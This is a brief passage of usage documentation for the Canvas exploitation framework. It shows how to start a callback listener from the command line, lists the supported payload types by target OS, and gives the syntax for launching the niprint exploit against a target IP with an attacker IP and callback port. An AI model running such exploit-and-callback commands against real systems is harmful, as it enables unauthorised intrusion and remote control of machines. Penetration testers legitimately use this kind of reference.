A GUI can be convenient, but running from a command line often allows more flexibility and can make it easier to achieve remote tasks. To use the command line, perform the following steps:
Set up the exploit callback listener. From the Canvas directory, use the command:
python commandlineInterface.py -p[CALLBACK PORT]
-v[TARGET OS]
The -v
option currently supports:
0 LINUXEXECVE 1 WIN32MOSDEF 2 LINUXMOSDEF 3 SOLARISMOSDEF 4 BSDMOSDEF 5 OSXMOSDEF 6 AIXMOSDEF 7 PHPMULTI
python ./exploits/niprint/niprint.py -v[OS TRAGERT VERSION]
-t[TARGET IP]
-p[T
ARGET PORT]
-l[ATTACKER IP]
-d[CALLBACK PORT]
-T[TESTING MODE]
-C[COVERTNESS LEVEL]